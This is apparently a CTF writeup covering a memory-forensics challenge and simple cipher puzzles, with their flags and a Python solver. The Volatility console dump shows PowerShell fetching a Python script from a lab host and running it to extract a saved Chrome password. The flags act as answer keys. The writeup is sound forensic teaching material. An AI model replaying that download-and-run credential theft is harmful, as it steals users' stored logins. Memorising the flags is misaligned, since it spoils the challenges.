This contest ran from 2022/9/24 6:00 (JST) to 2022/9/26 6:00 (JST).
I played as part of a team again this time. We finished with 876 points, 35th out of 244 teams.
Below are writeups for the challenges I solved myself.
Welcome! (Misc 1)
After joining the Discord and reading the message in the #rules channel, the flag turned out to be written among the rules.
WPI{d1sc0rd-rul3s-2022}
Copped Credentials (Forensics 200)
A memory forensics challenge.
$ volatility -f memdump.raw imageinfo
Volatility Foundation Volatility Framework 2.6
INFO    : volatility.debug    : Determining profile based on KDBG search...
          Suggested Profile(s) : Win7SP1x86_23418, Win7SP0x86, Win7SP1x86
                     AS Layer1 : IA32PagedMemory (Kernel AS)
                     AS Layer2 : FileAddressSpace (/mnt/hgfs/Shared/work/memdump.raw)
                      PAE type : No PAE
                           DTB : 0x185000L
                          KDBG : 0x82965378L
          Number of Processors : 2
     Image Type (Service Pack) : 1
                KPCR for CPU 0 : 0x80b96000L
                KPCR for CPU 1 : 0x80d9c000L
             KUSER_SHARED_DATA : 0xffdf0000L
           Image date and time : 2022-09-24 19:14:44 UTC+0000
     Image local date and time : 2022-09-24 15:14:44 -0400

$ volatility -f memdump.raw --profile=Win7SP1x86_23418 pstree
Volatility Foundation Volatility Framework 2.6
Name                                                  Pid   PPid   Thds   Hnds Time
-------------------------------------------------- ------ ------ ------ ------ ----
 0x85136d20:wininit.exe                               404    352      3     78 2022-09-24 19:12:25 UTC+0000
. 0x85a94030:services.exe                             460    404     20    230 2022-09-24 19:12:25 UTC+0000
.. 0x85b57828:svchost.exe                             640    460     13    368 2022-09-24 19:12:26 UTC+0000
... 0x84467750:WmiPrvSE.exe                          3620    640      9    125 2022-09-24 19:14:22 UTC+0000
... 0x844d8030:dllhost.exe                           3272    640      6     79 2022-09-24 19:14:42 UTC+0000
... 0x845f9d20:dllhost.exe                           4064    640      0 ------ 2022-09-24 19:14:41 UTC+0000
.. 0x85c80bb8:svchost.exe                            1416    460     23    338 2022-09-24 19:12:28 UTC+0000
.. 0x85cd5030:svchost.exe                            1516    460     12    153 2022-09-24 19:12:28 UTC+0000
.. 0x85c8fd20:svchost.exe                            1552    460     34    331 2022-09-24 19:12:28 UTC+0000
.. 0x84470640:svchost.exe                            3352    460      9    341 2022-09-24 19:14:21 UTC+0000
.. 0x845b2030:mscorsvw.exe                           2288    460      6     78 2022-09-24 19:14:30 UTC+0000
.. 0x8f2a1468:svchost.exe                             808    460     31    596 2022-09-24 19:12:26 UTC+0000
... 0x85bd6d20:audiodg.exe                           1000    808      7    128 2022-09-24 19:12:27 UTC+0000
.. 0x85bd0030:svchost.exe                             948    460     52   1118 2022-09-24 19:12:27 UTC+0000
... 0x842d4bb8:taskeng.exe                            580    948      7     86 2022-09-24 19:12:42 UTC+0000
.. 0x85d2c590:SearchIndexer.                         1332    460     14    625 2022-09-24 19:12:52 UTC+0000
... 0x845bed20:SearchProtocol                        3156   1332      8    283 2022-09-24 19:14:33 UTC+0000
... 0x84532a38:SearchFilterHo                        3140   1332      5    101 2022-09-24 19:14:33 UTC+0000
.. 0x85b71030:VBoxService.ex                          700    460     14    128 2022-09-24 19:12:26 UTC+0000
.. 0x845cbba0:sppsvc.exe                             2052    460      6    153 2022-09-24 19:14:30 UTC+0000
.. 0x843ffa48:wmpnetwk.exe                           3264    460     19    476 2022-09-24 19:14:21 UTC+0000
.. 0x85c632b0:spoolsv.exe                            1364    460     16    306 2022-09-24 19:12:28 UTC+0000
.. 0x852cb940:taskhost.exe                            356    460     10    182 2022-09-24 19:12:42 UTC+0000
.. 0x85bc07f0:svchost.exe                             864    460     29    519 2022-09-24 19:12:27 UTC+0000
... 0x86ab9480:dwm.exe                               1224    864      6     97 2022-09-24 19:12:44 UTC+0000
.. 0x84613030:svchost.exe                            2064    460     12    284 2022-09-24 19:14:30 UTC+0000
.. 0x85b7ec68:svchost.exe                             756    460      9    294 2022-09-24 19:12:26 UTC+0000
.. 0x85bc46f8:svchost.exe                             888    460     35    546 2022-09-24 19:12:27 UTC+0000
.. 0x85c36d20:svchost.exe                            1236    460     23    424 2022-09-24 19:12:27 UTC+0000
. 0x85ad2b00:lsass.exe                                476    404     11    757 2022-09-24 19:12:25 UTC+0000
. 0x85ae6600:lsm.exe                                  484    404     11    151 2022-09-24 19:12:25 UTC+0000
 0x858de030:csrss.exe                                 364    352      9    550 2022-09-24 19:12:25 UTC+0000
 0x85de3d20:explorer.exe                             1980   1488     24    624 2022-09-24 19:12:44 UTC+0000
. 0x851a84d8:VBoxTray.exe                            1372   1980     16    149 2022-09-24 19:12:44 UTC+0000
. 0x8534a5a0:chrome.exe                              2608   1980     45   1043 2022-09-24 19:14:18 UTC+0000
.. 0x8467ad20:DumpIt.exe                             3540   2608      2     40 2022-09-24 19:14:42 UTC+0000
.. 0x843b3a38:chrome.exe                             2828   2608     17    247 2022-09-24 19:14:20 UTC+0000
.. 0x85db7d20:chrome.exe                             2628   2608      9     75 2022-09-24 19:14:19 UTC+0000
.. 0x844814a8:chrome.exe                              152   2608     17    244 2022-09-24 19:14:26 UTC+0000
.. 0x843d8380:chrome.exe                             2892   2608      8    135 2022-09-24 19:14:20 UTC+0000
.. 0x84576918:chrome.exe                             1776   2608     17    229 2022-09-24 19:14:28 UTC+0000
.. 0x844bed20:chrome.exe                             3516   2608     12    181 2022-09-24 19:14:21 UTC+0000
. 0x85e91a68:cmd.exe                                 2124   1980      1     22 2022-09-24 19:12:54 UTC+0000
 0x842339c8:System                                      4      0     90    541 2022-09-24 19:12:22 UTC+0000
. 0x852ac550:smss.exe                                 280      4      2     30 2022-09-24 19:12:22 UTC+0000
 0x851a5598:csrss.exe                                 412    396     11    351 2022-09-24 19:12:25 UTC+0000
. 0x85e8ed20:conhost.exe                             2132    412      3     52 2022-09-24 19:12:54 UTC+0000
. 0x845f87b0:conhost.exe                             3196    412      2     52 2022-09-24 19:14:42 UTC+0000
 0x8561a918:winlogon.exe                              544    396      6    120 2022-09-24 19:12:26 UTC+0000

$ volatility -f memdump.raw --profile=Win7SP1x86_23418 consoles
Volatility Foundation Volatility Framework 2.6
**************************************************
ConsoleProcess: conhost.exe Pid: 2132
Console: 0xa81c0 CommandHistorySize: 50
HistoryBufferCount: 3 HistoryBufferMax: 4
OriginalTitle: Command Prompt
Title: Command Prompt
AttachedProcess: cmd.exe Pid: 2124 Handle: 0x5c
----
CommandHistory: 0x3d8e50 Application: python.exe Flags:
CommandCount: 0 LastAdded: -1 LastDisplayed: -1
FirstCommand: 0 CommandCountMax: 50
ProcessHandle: 0x0
----
CommandHistory: 0x3d8d58 Application: powershell.exe Flags:
CommandCount: 0 LastAdded: -1 LastDisplayed: -1
FirstCommand: 0 CommandCountMax: 50
ProcessHandle: 0x0
----
CommandHistory: 0x3d8ae0 Application: cmd.exe Flags: Allocated, Reset
CommandCount: 4 LastAdded: 3 LastDisplayed: 3
FirstCommand: 0 CommandCountMax: 50
ProcessHandle: 0x5c
Cmd #0 at 0x3cf200: cd AppData\Local\Google\Chrome
Cmd #1 at 0x3dcd18: powershell -c "Invoke-WebRequest http://192.168.56.107:8000/chrome.py -UseBasicParsing -OutFile 'chrome.py'"
Cmd #2 at 0x3d6b18: dir
Cmd #3 at 0x3d8d10: python chrome.py
----
Screen 0x3bcbc8 X:80 Y:300
Dump:
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Users\Ace>cd AppData\Local\Google\Chrome

C:\Users\Ace\AppData\Local\Google\Chrome>powershell -c "Invoke-WebRequest http:/
/192.168.56.107:8000/chrome.py -UseBasicParsing -OutFile 'chrome.py'"

C:\Users\Ace\AppData\Local\Google\Chrome>dir
 Volume in drive C has no label.
 Volume Serial Number is C055-775E

 Directory of C:\Users\Ace\AppData\Local\Google\Chrome

09/24/2022  03:11 PM    <DIR>          .
09/24/2022  03:11 PM    <DIR>          ..
09/24/2022  03:13 PM             4,553 chrome.py
09/24/2022  03:03 PM    <DIR>          User Data
               1 File(s)          4,553 bytes
               3 Dir(s)  21,991,317,504 bytes free

C:\Users\Ace\AppData\Local\Google\Chrome>python chrome.py
C:\Users\Ace\AppData\Local\Google\Chrome\User Data\Default\Login Data
Sequence: 3
URL: https://www.reddit.com/login
User Name: 0xExample
Password: WPI{Chr0m4t1c_Th31v3ry}
**************************************************

C:\Users\Ace\AppData\Local\Google\Chrome>
**************************************************
ConsoleProcess: conhost.exe Pid: 3196
Console: 0xa81c0 CommandHistorySize: 50
HistoryBufferCount: 1 HistoryBufferMax: 4
OriginalTitle: C:\Users\Ace\Downloads\DumpIt.exe
Title: C:\Users\Ace\Downloads\DumpIt.exe
AttachedProcess: DumpIt.exe Pid: 3540 Handle: 0xc
----
CommandHistory: 0x279868 Application: DumpIt.exe Flags: Allocated
CommandCount: 0 LastAdded: -1 LastDisplayed: -1
FirstCommand: 0 CommandCountMax: 50
ProcessHandle: 0xc
----
Screen 0x25ca60 X:80 Y:300
Dump:
  DumpIt - v1.3.2.20110401 - One click memory memory dumper
  Copyright (c) 2007 - 2011, Matthieu Suiche <http://www.msuiche.net>
  Copyright (c) 2010 - 2011, MoonSols <http://www.moonsols.com>

    Address space size:        1073676288 bytes (   1023 Mb)
    Free space size:          21983485952 bytes (  20965 Mb)

    * Destination = \??\C:\Users\Ace\Downloads\ACE-PC-20220924-191443.raw

    --> Are you sure you want to continue? [y/n] y
    + Processing...
Partway through the console dump, the flag appears as a saved password.
WPI{Chr0m4t1c_Th31v3ry}
I <3 Salads (Crypto 50)
A Caesar cipher. Decode the text inside the {} with https://www.geocachingtoolbox.com/index.php?lang=en&page=caesarCipher.
Rotation 3: ettubrutus
WPI{ettubrutus}
Train Time (Crypto 100)
Decode the numbers as ASCII codes.
#!/usr/bin/env python3
# Space-separated decimal ASCII codes from the challenge
enc = '087 103 095 048 055 080 103 052 097 095 104 048 097 051 073 085 099 103 099 099 095 050 056 123 104 104 103 104 111 051 057 057 125 099 118 048 053 053'
enc = enc.split(' ')
# Convert each code to its character and join them
msg = ''.join([chr(int(c)) for c in enc])
print(msg)
The decoded result is as follows.
Wg_07Pg4a_h0a3IUcgcc_28{hhgho399}cv055
Guessing it was a Rail Fence Cipher, I decoded it with https://www.dcode.fr/rail-fence-cipher. With the number of rails set to 5, it decrypted correctly.
WPI{chUgg4chvgga__ch0och00_3592a73895}
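As an added example (not code from the writeup), the script below carries both steps of this solve in one place: the ASCII decode, then a rail fence inversion that tries every rail count instead of guessing 5 and keeps the candidate that looks like a flag. Using the prefix 'WPI{' as the selection criterion is an assumption taken from the other flags in this writeup.

```python
#!/usr/bin/env python3
"""Train Time: decimal ASCII codes -> rail fence -> flag."""

# Challenge ciphertext copied from the writeup.
ENC = ('087 103 095 048 055 080 103 052 097 095 104 048 097 051 073 085 '
       '099 103 099 099 095 050 056 123 104 104 103 104 111 051 057 057 '
       '125 099 118 048 053 053')


def decode_ascii(codes: str) -> str:
    """Space-separated decimal codes -> intermediate string."""
    return ''.join(chr(int(c)) for c in codes.split())


def rail_pattern(length: int, rails: int) -> list:
    """Rail index visited by each plaintext position in the zigzag."""
    period = 2 * (rails - 1)
    return [min(i % period, period - i % period) for i in range(length)]


def rail_fence_decrypt(cipher: str, rails: int) -> str:
    """Invert the fence: the ciphertext is the rails read top to bottom."""
    pattern = rail_pattern(len(cipher), rails)
    # Plaintext positions grouped by rail, in the order they were written out.
    order = [i for r in range(rails) for i, p in enumerate(pattern) if p == r]
    plain = [''] * len(cipher)
    for ct_char, pt_pos in zip(cipher, order):
        plain[pt_pos] = ct_char
    return ''.join(plain)


def solve(codes: str = ENC, prefix: str = 'WPI{') -> tuple:
    """Decode, then try every rail count and keep the first that yields a flag.
    The 'WPI{' prefix is assumed from the other flags in this writeup."""
    intermediate = decode_ascii(codes)
    for rails in range(2, len(intermediate)):
        candidate = rail_fence_decrypt(intermediate, rails)
        if candidate.startswith(prefix) and candidate.endswith('}'):
            return rails, candidate
    raise ValueError('no rail count produced a flag')


if __name__ == '__main__':
    rails, flag = solve()
    print(f'rails={rails} flag={flag}')
```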